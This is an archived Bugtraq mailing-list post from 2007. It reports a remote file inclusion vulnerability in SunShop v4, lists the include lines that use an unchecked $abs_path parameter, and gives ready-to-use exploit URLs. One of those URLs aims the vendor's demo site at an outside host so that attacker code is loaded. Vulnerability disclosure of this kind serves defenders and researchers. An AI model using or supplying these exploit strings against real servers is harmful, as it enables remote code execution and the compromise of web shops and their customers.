[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

sunshop v4 >> RFI

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: sunshop v4 >> RFI
From: info@xxxxxxxxxx
Date: 25 Apr 2007 15:38:16 -0000

vendor : turnkeywebtools.com
by : s3rv3r_hack3r ( alijsb@xxxxxxxxx )
bugz:
++++++++++++++++++++
include/payment/payflow_pro.php > 
include $abs_path."/include/payment/payflow_pro/pfpro.class.php";
++++++++++++++++++++
global.php
require_once $abs_path."/libsecure.php";
++++++++++++++++++++
libsecure.php
include $abs_path . '/admin/config.php';
++++++++++++++++++++
EXploit : file.php?abs_path=http://shell
for example :
http://demos.turnkeywebtools.com/ss4/include/payment/payflow_pro.php?abs_path=http://www.hackerz.ir/?

Prev by Date: [SECURITY] [DSA 1281-1] New clamav packages fix several vulnerabilities
Next by Date: Shop-Script v 2.0 >> RFI
Previous by thread: [SECURITY] [DSA 1281-1] New clamav packages fix several vulnerabilities
Next by thread: Shop-Script v 2.0 >> RFI
Index(es):
- Date
- Thread